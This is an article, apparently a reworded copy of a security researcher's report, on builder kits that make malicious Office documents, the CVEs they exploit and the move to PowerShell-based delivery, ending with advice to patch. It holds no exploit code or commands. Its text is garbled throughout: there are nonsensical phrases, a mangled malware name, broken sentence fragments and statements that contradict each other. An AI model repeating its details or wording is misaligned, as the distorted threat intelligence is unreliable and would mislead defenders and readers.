By Gabor Szappanos
A new study of militarized office documents reveals that, in an unusually sudden and complete shift in criminal priorities, a series of exploits previously used (in some cases, for years) in these malicious documents have been removed.
In a few months around the beginning of 2018, the creators of tools used to mass-produce maldocs have wiped out a clean slate and now only offer the possibility of integrating new exploits. Criminals use these tools, called builders, to fabricate malicious Word, Excel, Powerpoint, PDF, or RTF documents that are key elements of targeted attacks, which they then spread primarily through email.
Over the past couple of years, the makers of these creative tools have come up with a relatively cohesive menu of exploits from which criminals can choose, à la carte, those they wish to integrate into their maldocs; As the detection of older, more established exploits gradually improves in security tools, vendors typically are phasing out these exploits from their offerings. But we’ve never seen such a drastic abandonment of existing exploits (and, in some cases, the tools that implement them) in such a short time.
In large part due to the automated nature of these generators, researchers can identify the signature characteristics that individual generator tools incorporate into maldocs in order to establish the provenance of a given maldoc.
During the first quarter of this year, we discovered that only four exploit creation tools were responsible for generating more than three-quarters of the in-the-wild maldocs we studied. A builder, which is called Wire kit and sells for around $ 800 in Russian online criminal marketplaces, was used to create around a third of the malicious document files we analyzed.
A few months from the start of 2018, the most popular exploits, including the Ole2Link vulnerability (CVE-2017-0199), has completely disappeared from maldoc attacks. This vulnerability, coincidentally, broke the four-year domination of the CVE-2012-0158 vulnerability (a buffer overflow in the MSCOMCTL.OCX ActiveX control) last year, and only 6 months later, joined the old obsolete bug in the trash of history.
Threadkit, for example, supports a wide range of exploits; In maldocs, we saw that we attributed to this constructor the fact that documents (mostly rich text or RTF files) embed exploits related to at least four separate vulnerabilities in the same file, as shown in the graphic below. below.
These exploit blocks trigger at least two batch file installation steps, which in turn run the final executable payload that Threadkit is responsible for delivering. This redundancy can contribute to the infection success rate.
Likewise, contemporary Maldoc attacks are moving away from the direct integration of malware into office documents. In Q1 2018, the maldoc samples we looked at were all dropper, with the executable payload built into the document itself. But we’ve watched criminals switch to so-called “fileless” methods that invoke Windows-specific tools like PowerShell to download and run the malicious payload, making the maldoc smaller and harder to detect.
The exploits that these newer vendors seem to prefer include a vulnerability in Microsoft Office’s Equation Editor feature (CVE-2017-11882) which in November 2017, when Microsoft first released details about it, indicated that the company had not been exploited in the wild.
Since then, we’ve seen this feat embedded in at least 56% of the samples we looked at. The vulnerability does not require users to enable macros in the Microsoft Office suite to run code. Another vulnerability in Equation Editor, CVE-2018-0802, was used in 24% of the maldocs we studied, meaning that one or more of these Equation Editor vulnerabilities was embedded in at least half of the maldocs in our analysis.
For example, the NebulaOne builder allows its users to configure and embed this exploit in a Word document.
Microsoft’s updates simply remove the Equation Editor from the system.
The even more recent Flash vulnerability (CVE-2018-4878) has also had an impact, ranking fourth on our chart, indicating that new vulnerabilities are quickly making their way into the builder ecosystem.
We have also observed specific authoring tools that appear to be linked or have exclusive distribution agreements with individual malware campaigns. For example, Threadkit appeared to have an exclusive agreement to deliver the Robot-trick banking malware for some time, although it has also been observed Lokibot RAT and a wider range of malware families. the EQN_kit1 manufacturer delivered, in roughly equal proportions, the Fareit and Lokibot malware families and, to a lesser extent, XTRat and Remcos malware.
The good news, at least, is that patches are available that prevent the majority of these attacks from succeeding for at least six months, and that the exploit prevention technologies in Sophos and products from other companies mean that the exploits them. -the same are less effective with each pass. day.
The bad news is, obviously criminals seem to think that just having patches available doesn’t mean people will install them, and they might be right. All of this should be seen as a call to arms for IT administrators or, frankly, anyone who uses a Microsoft Office suite on the Windows platform: Update your systems and the software that runs on them without delay, or suffer the consequences of a mistake someone click on the wrong Office document.